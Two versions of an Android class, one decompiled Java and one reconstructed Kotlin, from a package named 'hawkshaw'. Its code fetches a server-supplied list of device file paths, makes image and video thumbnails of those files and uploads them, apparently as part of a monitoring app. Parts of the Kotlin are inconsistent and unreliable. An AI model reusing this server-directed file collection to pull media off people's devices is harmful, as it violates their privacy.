File: Dummy/hawkshaw/library/features/media/filecrud/ThumbnailsUtilsNewKt.java
package com.hawkshaw.library.features.media.filecrud;

import O1.u;
import O1.v;
import X1.B;
import Y1.K;
import a3.e;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.media.ExifInterface;
import android.media.MediaMetadataRetriever;
import android.media.ThumbnailUtils;
import android.net.Uri;
import com.hawkshaw.library.App;
import com.hawkshaw.library.logger.Logger;
import i.C0528x;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.util.List;
import t3.N;

public final class ThumbnailsUtilsNewKt {
    private static final String TAG = "ThumbnailsUtilsNew";

    /* access modifiers changed from: private */
    public static final Object getFiles(List<String> list, e eVar) {
        return B.B(N.f9292c, new u(list, (e) null), eVar);
    }

    /* access modifiers changed from: private */
    public static final byte[] getImageThumbnail(File file, ByteArrayOutputStream byteArrayOutputStream) {
        ExifInterface exifInterface;
        Bitmap bitmap;
        try {
            exifInterface = new ExifInterface(file.getPath());
        } catch (Exception unused) {
            exifInterface = null;
        }
        if (exifInterface == null || !exifInterface.hasThumbnail()) {
            try {
                bitmap = ThumbnailUtils.extractThumbnail(BitmapFactory.decodeFile(file.getPath()), 128, 128);
            } catch (Exception e5) {
                Logger.v$default(Logger.INSTANCE, TAG, C0528x.e("Image: ", file.getPath(), ", ", e5.getMessage()), false, 4, (Object) null);
                bitmap = null;
            }
        } else {
            bitmap = exifInterface.getThumbnailBitmap();
        }
        if (bitmap != null) {
            return toByteArray(bitmap, byteArrayOutputStream);
        }
        return null;
    }

    /* access modifiers changed from: private */
    public static final Object getThumbnail(File file, ByteArrayOutputStream byteArrayOutputStream, e eVar) {
        return B.B(N.f9292c, new v(file, byteArrayOutputStream, (e) null), eVar);
    }

    /* access modifiers changed from: private */
    public static final byte[] getVideoThumbnail(File file, ByteArrayOutputStream byteArrayOutputStream) {
        Bitmap bitmap;
        MediaMetadataRetriever mediaMetadataRetriever = new MediaMetadataRetriever();
        try {
            mediaMetadataRetriever.setDataSource(App.Companion.getContext(), Uri.parse(file.getPath()));
            Bitmap frameAtTime = mediaMetadataRetriever.getFrameAtTime(1000, 2);
            if (frameAtTime != null) {
                bitmap = Bitmap.createScaledBitmap(frameAtTime, 128, 128, false);
                mediaMetadataRetriever.release();
                if (bitmap != null) {
                    return toByteArray(bitmap, byteArrayOutputStream);
                }
                return null;
            }
            throw new Exception();
        } catch (Exception e5) {
            Logger.v$default(Logger.INSTANCE, TAG, "Video MMR: " + file.getPath() + ", " + e5.getMessage(), false, 4, (Object) null);
            try {
                bitmap = ThumbnailUtils.createVideoThumbnail(file.getPath(), 1);
            } catch (Exception e6) {
                Logger.v$default(Logger.INSTANCE, TAG, "Video TU: " + file.getPath() + ", " + e6.getMessage(), false, 4, (Object) null);
                bitmap = null;
            }
        } catch (Throwable th) {
            mediaMetadataRetriever.release();
            throw th;
        }
    }

    /* JADX WARNING: type inference failed for: r10v12, types: [java.lang.Object, j3.q] */
    /* JADX WARNING: type inference failed for: r0v3, types: [c3.c] */
    /* JADX WARNING: Multi-variable type inference failed */
    /* JADX WARNING: Removed duplicated region for block: B:16:0x004d  */
    /* JADX WARNING: Removed duplicated region for block: B:22:0x007a  */
    /* JADX WARNING: Removed duplicated region for block: B:28:0x00be A[RETURN] */
    /* JADX WARNING: Removed duplicated region for block: B:29:0x00bf A[RETURN] */
    /* JADX WARNING: Removed duplicated region for block: B:8:0x0026  */
    /* Code decompiled incorrectly, please refer to instructions dump. */
    public static final java.lang.Object pushThumbnailsNew(a3.e r10) {
        /*
            boolean r0 = r10 instanceof O1.w
            if (r0 == 0) goto L_0x0013
            r0 = r10
            O1.w r0 = (O1.w) r0
            int r1 = r0.f1560G
            r2 = -2147483648(0xffffffff80000000, float:-0.0)
            r3 = r1 & r2
            if (r3 == 0) goto L_0x0013
            int r1 = r1 - r2
            r0.f1560G = r1
            goto L_0x0018
        L_0x0013:
            O1.w r0 = new O1.w
            r0.<init>(r10)
        L_0x0018:
            java.lang.Object r10 = r0.f1559F
            b3.a r1 = b3.C0298a.f4140D
            int r2 = r0.f1560G
            W2.y r3 = W2.y.f2418a
            r4 = 3
            r5 = 2
            r6 = 1
            r7 = 0
            if (r2 == 0) goto L_0x004d
            if (r2 == r6) goto L_0x0043
            if (r2 == r5) goto L_0x0039
            if (r2 != r4) goto L_0x0031
            Y1.C0110h.P(r10)
            goto L_0x00bf
        L_0x0031:
            java.lang.IllegalStateException r10 = new java.lang.IllegalStateException
            java.lang.String r0 = "call to 'resume' before 'invoke' with coroutine"
            r10.<init>(r0)
            throw r10
        L_0x0039:
            java.lang.Object r2 = r0.f1558E
            java.util.List r2 = (java.util.List) r2
            j3.q r5 = r0.f1557D
            Y1.C0110h.P(r10)
            goto L_0x00ab
        L_0x0043:
            java.lang.Object r2 = r0.f1558E
            java.io.ByteArrayOutputStream r2 = (java.io.ByteArrayOutputStream) r2
            j3.q r6 = r0.f1557D
            Y1.C0110h.P(r10)
            goto L_0x0074
        L_0x004d:
            Y1.C0110h.P(r10)
            j3.q r10 = new j3.q
            r10.<init>()
            java.io.ByteArrayOutputStream r2 = new java.io.ByteArrayOutputStream
            r2.<init>()
            com.hawkshaw.library.datalayer.Injector$Companion r8 = com.hawkshaw.library.datalayer.Injector.Companion
            com.hawkshaw.library.datalayer.Injector r8 = r8.getInstance()
            com.hawkshaw.library.datalayer.network.service.MediaService r8 = r8.getMediaService()
            r0.f1557D = r10
            r0.f1558E = r2
            r0.f1560G = r6
            java.lang.Object r6 = r8.getPendingThumbnails(r0)
            if (r6 != r1) goto L_0x0071
            return r1
        L_0x0071:
            r9 = r6
            r6 = r10
            r10 = r9
        L_0x0074:
            com.hawkshaw.library.datalayer.network.twirp.ApiResponse r10 = (com.hawkshaw.library.datalayer.network.twirp.ApiResponse) r10
            boolean r8 = r10 instanceof com.hawkshaw.library.datalayer.network.twirp.ApiResponse.Success
            if (r8 == 0) goto L_0x00bf
            com.hawkshaw.library.datalayer.network.twirp.ApiResponse$Success r10 = (com.hawkshaw.library.datalayer.network.twirp.ApiResponse.Success) r10
            java.lang.Object r10 = r10.getResult()
            com.hawkshaw.library.datalayer.models.GetPendingThumbnailsResponse r10 = (com.hawkshaw.library.datalayer.models.GetPendingThumbnailsResponse) r10
            java.util.List r10 = r10.getPaths()
            O1.z r8 = new O1.z
            r8.<init>(r10, r2, r6, r7)
            w3.e r2 = new w3.e
            r2.<init>((i3.p) r8)
            com.hawkshaw.library.datalayer.Injector$Companion r8 = com.hawkshaw.library.datalayer.Injector.Companion
            com.hawkshaw.library.datalayer.Injector r8 = r8.getInstance()
            com.hawkshaw.library.datalayer.network.service.FileService r8 = r8.getFileService()
            r0.f1557D = r6
            r0.f1558E = r10
            r0.f1560G = r5
            java.lang.Object r2 = r8.uploadThumbnails(r2, r0)
            if (r2 != r1) goto L_0x00a7
            return r1
        L_0x00a7:
            r5 = r6
            r9 = r2
            r2 = r10
            r10 = r9
        L_0x00ab:
            w3.b r10 = (w3.C1066b) r10
            O1.x r6 = new O1.x
            r6.<init>(r5, r2, r7)
            r0.f1557D = r7
            r0.f1558E = r7
            r0.f1560G = r4
            java.lang.Object r10 = v3.j.c(r0, r6, r10)
            if (r10 != r1) goto L_0x00bf
            return r1
        L_0x00bf:
            return r3
        */
        throw new UnsupportedOperationException("Method not decompiled: com.hawkshaw.library.features.media.filecrud.ThumbnailsUtilsNewKt.pushThumbnailsNew(a3.e):java.lang.Object");
    }

    private static final byte[] toByteArray(Bitmap bitmap, ByteArrayOutputStream byteArrayOutputStream) {
        byteArrayOutputStream.reset();
        bitmap.compress(Bitmap.CompressFormat.PNG, 90, byteArrayOutputStream);
        byte[] byteArray = byteArrayOutputStream.toByteArray();
        K.m(byteArray, "toByteArray(...)");
        return byteArray;
    }
}

File: app/src/main/java/com/hawkshaw/library/features/media/filecrud/ThumbnailsUtilsNewKt.kt
package com.hawkshaw.library.features.media.filecrud

import android.graphics.Bitmap
import android.graphics.BitmapFactory
import androidx.exifinterface.media.ExifInterface
import android.media.MediaMetadataRetriever
import android.media.ThumbnailUtils
import android.net.Uri
import android.os.Build
import android.provider.MediaStore
import android.util.Log // Added for Android logging
import androidx.annotation.RequiresApi
import com.hawkshaw.library.App
import com.hawkshaw.library.datalayer.Injector
import com.hawkshaw.library.datalayer.models.GetPendingThumbnailsResponse
// Assuming GrpcResponse is correctly imported if needed by other parts of the file
import com.hawkshaw.library.datalayer.network.grpc.GrpcResponse
import com.hawkshaw.library.datalayer.network.twirp.ApiResponse
import com.hawkshaw.library.logger.Logger
import kotlinx.coroutines.Dispatchers
import kotlinx.coroutines.flow.collect
import kotlinx.coroutines.withContext
import java.io.ByteArrayOutputStream
import java.io.File
import androidx.core.graphics.scale


private const val TAG = "ThumbnailsUtilsNew"

/**
 * Process a single thumbnail extraction.
 *
 * @param file The file from which to extract the thumbnail.
 * @param byteArrayOutputStream A ByteArrayOutputStream to use for converting Bitmap to ByteArray.
 * @return The thumbnail as a ByteArray, or null if extraction fails.
 */
@RequiresApi(Build.VERSION_CODES.O)
private suspend fun getThumbnail(file: File, byteArrayOutputStream: ByteArrayOutputStream): ByteArray? = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] getThumbnail called for file: ${file.path}")
    if (!file.exists() || !file.isFile) {
        Log.w(TAG, "[DEBUG] File not found or is not a file for thumbnail: ${file.path}")
        Logger.w(TAG, "File not found or is not a file for thumbnail: ${file.path}")
        return@withContext null
    }

    val result = when {
        file.path.endsWith(".jpg", ignoreCase = true) ||
        file.path.endsWith(".jpeg", ignoreCase = true) ||
        file.path.endsWith(".png", ignoreCase = true) -> {
            Log.d(TAG, "[DEBUG] Identified as image: ${file.path}. Calling getImageThumbnail.")
            getImageThumbnail(file, byteArrayOutputStream)
        }

        file.path.endsWith(".mp4", ignoreCase = true) ||
        file.path.endsWith(".3gp", ignoreCase = true) ||
        file.path.endsWith(".webm", ignoreCase = true) ||
        file.path.endsWith(".mkv", ignoreCase = true) -> {
            Log.d(TAG, "[DEBUG] Identified as video: ${file.path}. Calling getVideoThumbnail.")
            getVideoThumbnail(file, byteArrayOutputStream)
        }

        else -> {
            Log.w(TAG, "[DEBUG] Unsupported file type for thumbnail: ${file.path}")
            Logger.d(TAG, "Unsupported file type for thumbnail: ${file.path}", false, 4, null)
            null
        }
    }
    Log.d(TAG, "[DEBUG] getThumbnail for ${file.path} result size: ${result?.size ?: "null"}")
    return@withContext result
}

/**
 * Extract a thumbnail from an image file.
 *
 * @param file The image file.
 * @param byteArrayOutputStream A ByteArrayOutputStream for conversion.
 * @return The thumbnail as a ByteArray, or null.
 */
@RequiresApi(Build.VERSION_CODES.O)
private fun getImageThumbnail(file: File, byteArrayOutputStream: ByteArrayOutputStream): ByteArray? {
    Log.d(TAG, "[DEBUG] getImageThumbnail called for file: ${file.path}")
    val exifInterface = try {
        Log.d(TAG, "[DEBUG] Attempting to read EXIF for ${file.path}")
        ExifInterface(file.path)
    } catch (e: Exception) {
        Log.w(TAG, "[DEBUG] Failed to initialize ExifInterface for ${file.path}: ${e.message}")
        Logger.v(TAG, "Failed to read EXIF for ${file.path}: ${e.message}", false, 4, null)
        null
    }

    val bitmap = if (exifInterface != null && exifInterface.hasThumbnail()) {
        Log.d(TAG, "[DEBUG] EXIF thumbnail found for ${file.path}. Extracting thumbnailBitmap.")
        exifInterface.thumbnailBitmap
    } else {
        Log.d(TAG, "[DEBUG] No EXIF thumbnail for ${file.path} or exifInterface is null. Attempting to decode full image.")
        try {
            BitmapFactory.decodeFile(file.path)?.let { fullBitmap ->
                Log.d(TAG, "[DEBUG] Full image decoded for ${file.path}. Original size: ${fullBitmap.width}x${fullBitmap.height}. Extracting thumbnail (128x128).")
                val thumbnail = ThumbnailUtils.extractThumbnail(fullBitmap, 128, 128)
                Log.d(TAG, "[DEBUG] Thumbnail extracted from full image. Size: ${thumbnail?.width}x${thumbnail?.height}. Recycling full bitmap.")
                fullBitmap.recycle()
                thumbnail
            }
        } catch (e: Exception) {
            Log.e(TAG, "[DEBUG] Error decoding/extracting image thumbnail from ${file.path}: ${e.message}", e)
            Logger.v(TAG, "Error extracting image thumbnail from ${file.path}: ${e.message}", false, 4,  null)
            null
        }
    }

    return if (bitmap != null) {
        Log.d(TAG, "[DEBUG] Bitmap obtained for ${file.path}. Converting to byte array.")
        val byteArray = toByteArray(bitmap, byteArrayOutputStream)
        Log.d(TAG, "[DEBUG] getImageThumbnail: Byte array created for ${file.path}, size: ${byteArray.size}")
        byteArray
    } else {
        Log.w(TAG, "[DEBUG] No bitmap could be obtained for image thumbnail: ${file.path}")
        null
    }
}

/**
 * Extract a thumbnail from a video file.
 *
 * @param file The video file.
 * @param byteArrayOutputStream A ByteArrayOutputStream for conversion.
 * @return The thumbnail as a ByteArray, or null.
 */
private fun getVideoThumbnail(file: File, byteArrayOutputStream: ByteArrayOutputStream): ByteArray? {
    Log.d(TAG, "[DEBUG] getVideoThumbnail called for file: ${file.path}")
    val mediaMetadataRetriever = MediaMetadataRetriever()
    var finalByteArray: ByteArray? = null

    try {
        Log.d(TAG, "[DEBUG] Setting data source for MediaMetadataRetriever: ${Uri.fromFile(file)}")
        mediaMetadataRetriever.setDataSource(App.getContext(), Uri.fromFile(file))
        Log.d(TAG, "[DEBUG] Attempting to get frame at time (1000us) for ${file.path}")
        val frameAtTime = mediaMetadataRetriever.getFrameAtTime(1000, MediaMetadataRetriever.OPTION_CLOSEST_SYNC)
            ?: throw Exception("No frame found for video thumbnail")
        Log.d(TAG, "[DEBUG] Frame retrieved for ${file.path}. Original size: ${frameAtTime.width}x${frameAtTime.height}. Scaling to 128x128.")

        val bitmap = frameAtTime.scale(128, 128, false)
        frameAtTime.recycle()
        Log.d(TAG, "[DEBUG] Frame scaled and original recycled. Converting to byte array.")

        finalByteArray = toByteArray(bitmap, byteArrayOutputStream)
        Log.d(TAG, "[DEBUG] getVideoThumbnail: Byte array created via MMR for ${file.path}, size: ${finalByteArray.size}")

    } catch (e: Exception) {
        Log.e(TAG, "[DEBUG] MediaMetadataRetriever error for ${file.path}: ${e.message}", e)
        Logger.v(TAG, "Video MMR error for ${file.path}: ${e.message}", false, 4, null)

        Log.d(TAG, "[DEBUG] Fallback: Attempting ThumbnailUtils.createVideoThumbnail for ${file.path}")
        try {
            val bitmap = ThumbnailUtils.createVideoThumbnail(file.path, MediaStore.Images.Thumbnails.MINI_KIND)
            if (bitmap != null) {
                Log.d(TAG, "[DEBUG] ThumbnailUtils.createVideoThumbnail succeeded for ${file.path}. Size: ${bitmap.width}x${bitmap.height}. Converting to byte array.")
                finalByteArray = toByteArray(bitmap, byteArrayOutputStream)
                Log.d(TAG, "[DEBUG] getVideoThumbnail: Byte array created via ThumbnailUtils for ${file.path}, size: ${finalByteArray?.size}")
            } else {
                Log.w(TAG, "[DEBUG] ThumbnailUtils.createVideoThumbnail returned null for ${file.path}")
            }
        } catch (tuException: Exception) {
            Log.e(TAG, "[DEBUG] ThumbnailUtils.createVideoThumbnail error for ${file.path}: ${tuException.message}", tuException)
            Logger.v(TAG, "Video TU error for ${file.path}: ${tuException.message}", false, 4, null)
        }
    } finally {
        Log.d(TAG, "[DEBUG] Releasing MediaMetadataRetriever for ${file.path}")
        try {
            mediaMetadataRetriever.release()
            Log.d(TAG, "[DEBUG] MediaMetadataRetriever released successfully for ${file.path}")
        } catch (releaseEx: Exception) {
            Log.e(TAG, "[DEBUG] Error releasing MediaMetadataRetriever: ${releaseEx.message}", releaseEx)
            Logger.e(TAG, "Error releasing MediaMetadataRetriever: ${releaseEx.message}", releaseEx, false, 12, null)
        }
    }
    Log.d(TAG, "[DEBUG] getVideoThumbnail for ${file.path} returning byte array of size: ${finalByteArray?.size ?: "null"}")
    return finalByteArray
}

/**
 * Convert a bitmap to a byte array using the provided OutputStream.
 *
 * @param bitmap The Bitmap to convert.
 * @param byteArrayOutputStream The OutputStream to use for compression.
 * @return The ByteArray representation of the Bitmap.
 */
private fun toByteArray(bitmap: Bitmap, byteArrayOutputStream: ByteArrayOutputStream): ByteArray {
    Log.d(TAG, "[DEBUG] toByteArray called for bitmap: $bitmap")
    byteArrayOutputStream.reset()
    Log.d(TAG, "[DEBUG] toByteArray: Stream reset. Compressing bitmap to PNG, quality 90.")
    bitmap.compress(Bitmap.CompressFormat.PNG, 90, byteArrayOutputStream)
    Log.d(TAG, "[DEBUG] toByteArray: Bitmap compressed. Recycling bitmap.")
    bitmap.recycle()
    val byteArray = byteArrayOutputStream.toByteArray()
    Log.d(TAG, "[DEBUG] toByteArray: Byte array created, size: ${byteArray.size}")
    return byteArray
}

/**
 * Get thumbnails for a list of file paths.
 * Note: This function `getFiles` is declared but not used in the `pushThumbnailsNew` provided.
 */
@RequiresApi(Build.VERSION_CODES.O)
private suspend fun getFiles(paths: List<String>) = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] getFiles called with ${paths.size} paths.")
    val result = mutableMapOf<String, ByteArray?>()
    val outputStream = ByteArrayOutputStream()

    for (path in paths) {
        Log.d(TAG, "[DEBUG] getFiles: Processing path: $path")
        val file = File(path)
        if (!file.exists() || !file.isFile) {
            Log.w(TAG, "[DEBUG] getFiles: File does not exist or is not a file: $path")
            result[path] = null
            continue
        }

        val thumbnail = getThumbnail(file, outputStream)
        Log.d(TAG, "[DEBUG] getFiles: Thumbnail for $path size: ${thumbnail?.size ?: "null"}. Adding to result.")
        result[path] = thumbnail
    }
    Log.d(TAG, "[DEBUG] getFiles finished. Result map size: ${result.size}")
    return@withContext result
}

/**
 * Process and push thumbnails for pending files.
 */
@RequiresApi(Build.VERSION_CODES.O)
suspend fun pushThumbnailsNew(): ApiResponse<Unit> = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] pushThumbnailsNew called.")
    val byteArrayOutputStream = ByteArrayOutputStream()

    try {
        Log.d(TAG, "[DEBUG] Getting pending thumbnails from mediaService.")
        val pendingResponse = Injector.INSTANCE.mediaService.getPendingThumbnails()
        Log.d(TAG, "[DEBUG] Received pending thumbnails response: $pendingResponse")

        when (pendingResponse) {
            is ApiResponse.Success<GetPendingThumbnailsResponse> -> {
                val responseData = pendingResponse.result
                Log.d(TAG, "[DEBUG] Successfully fetched pending thumbnails. Count: ${responseData.paths.size}")
                val pendingPaths = responseData.paths

                if (pendingPaths.isEmpty()) {
                    Log.d(TAG, "[DEBUG] No pending thumbnails to process.")
                    Logger.d(TAG, "No pending thumbnails to process", false, 4, null)
                    return@withContext ApiResponse.Success(Unit)
                }

                Log.d(TAG, "[DEBUG] Processing ${pendingPaths.size} pending thumbnails.")
                Logger.d(TAG, "Processing ${pendingPaths.size} pending thumbnails", false, 4, null)

                val thumbnailsMap = mutableMapOf<String, ByteArray>()
                for (path in pendingPaths) {
                    Log.d(TAG, "[DEBUG] Generating thumbnail for pending path: $path")
                    val file = File(path)
                    if (!file.exists() || !file.isFile) {
                        Log.w(TAG, "[DEBUG] File does not exist for pending path: $path, skipping.")
                        Logger.v(TAG, "File does not exist: $path, skipping thumbnail generation.", false, 4, null)
                        continue
                    }

                    val thumbnail = getThumbnail(file, byteArrayOutputStream)
                    if (thumbnail != null) {
                        Log.d(TAG, "[DEBUG] Thumbnail generated for $path, size: ${thumbnail.size}. Adding to map.")
                        thumbnailsMap[path] = thumbnail
                    } else {
                        Log.w(TAG, "[DEBUG] Thumbnail generation failed for pending path: $path")
                    }
                }
                Log.d(TAG, "[DEBUG] Finished generating all pending thumbnails. Map size: ${thumbnailsMap.size}")

                val uploadRequest = com.hawkshaw.library.features.media.filecrud.ThumbnailUploadRequest(
                    thumbnails = thumbnailsMap,
                    paths = pendingPaths
                )
                Log.d(TAG, "[DEBUG] Prepared ThumbnailUploadRequest: $uploadRequest")

                Log.d(TAG, "[DEBUG] Uploading thumbnails via fileService.")
                val uploadResponseFlow = Injector.INSTANCE.fileService.uploadThumbnails(uploadRequest)
                var overallUploadSuccess = true

                Log.d(TAG, "[DEBUG] Collecting responses from uploadResponseFlow.")
                uploadResponseFlow.collect { grpcResponse ->
                    Log.d(TAG, "[DEBUG] Received GrpcResponse from flow: $grpcResponse")
                    when (grpcResponse) {
                        is com.hawkshaw.library.datalayer.network.grpc.GrpcResponse.Success -> {
                            // Corrected: Log the grpcResponse object or a generic success message
                            Log.d(TAG, "[DEBUG] Part of thumbnail upload successful. GrpcResponse: $grpcResponse")
                            Logger.d(TAG, "Part of thumbnail upload successful.", false, 4, null)
                        }
                        is com.hawkshaw.library.datalayer.network.grpc.GrpcResponse.Error -> {
                            // Corrected: Removed .code, log grpcResponse.error or just its message
                            Log.e(TAG, "[DEBUG] Part of thumbnail upload failed. Error message: ${grpcResponse.error.message}")
                            Logger.e(TAG, "Part of thumbnail upload failed: ${grpcResponse.error.message}",
                                throwable = null, b = false, i = 12, nothing = null)
                            overallUploadSuccess = false
                        }
                        is com.hawkshaw.library.datalayer.network.grpc.GrpcResponse.InProgress -> {
                            // Corrected: Log the grpcResponse object or a generic in-progress message
                            Log.d(TAG, "[DEBUG] Thumbnail upload part in progress. GrpcResponse: $grpcResponse")
                            Logger.d(TAG, "Thumbnail upload part in progress.", false,4,null)
                        }
                        is com.hawkshaw.library.datalayer.network.grpc.GrpcResponse.Default -> {
                            Log.d(TAG, "[DEBUG] Thumbnail upload part default state. GrpcResponse: $grpcResponse")
                            Logger.d(TAG, "Thumbnail upload part default state.", false,4,null)
                        }
                    }
                }
                Log.d(TAG, "[DEBUG] Finished collecting from uploadResponseFlow. Overall success: $overallUploadSuccess")
                return@withContext if (overallUploadSuccess) ApiResponse.Success(Unit) else ApiResponse.Error("Some thumbnail uploads failed")
            }
            is ApiResponse.Error<*> -> {
                Log.e(TAG, "[DEBUG] Failed to get pending thumbnails. Error: ${pendingResponse.errorMessage}")
                Logger.e(
                    TAG,
                    "Failed to get pending thumbnails: ${pendingResponse.errorMessage}",
                    throwable = null, b = false, i = 12, nothing = null)
                return@withContext ApiResponse.Error(pendingResponse.errorMessage ?: "Unknown error fetching pending thumbnails")
            }
            is ApiResponse.InProgress<*> -> {
                Log.d(TAG, "[DEBUG] Pending thumbnails request in progress (ignoring).")
                Logger.d(TAG, "Pending thumbnails request in progress (ignoring)", false, 4, null)
                return@withContext ApiResponse.InProgress<Unit>()
            }
            else -> {
                Log.e(TAG, "[DEBUG] Received unexpected pending thumbnails response type: ${pendingResponse::class.simpleName}")
                Logger.e(
                    TAG,
                    "Received unexpected pending thumbnails response type: ${pendingResponse::class.simpleName}",
                    throwable = null, b = false, i = 12, nothing = null)
                return@withContext ApiResponse.Error("Unexpected response type from getPendingThumbnails")
            }
        }
    } catch (e: Exception) {
        Log.e(TAG, "[DEBUG] Exception during thumbnail processing: ${e.message}", e)
        Logger.e(TAG, "Exception during thumbnail processing: ${e.message}", e, false, 12, null)
        return@withContext ApiResponse.Error(e.message ?: "Unknown error during thumbnail processing")
    } finally {
        Log.d(TAG, "[DEBUG] Resetting byteArrayOutputStream in finally block.")
        byteArrayOutputStream.reset()
    }
}

/**
 * Data class representing a thumbnail upload request.
 * This class is separate from the one in ThumbnailsUtilsKt.kt (ThumbnailUploadRequest)
 * and is specifically used within the `pushThumbnailsNew` context.
 */
data class ThumbnailUploadRequestNew(
    val thumbnails: Map<String, ByteArray>,
    val paths: List<String>
)
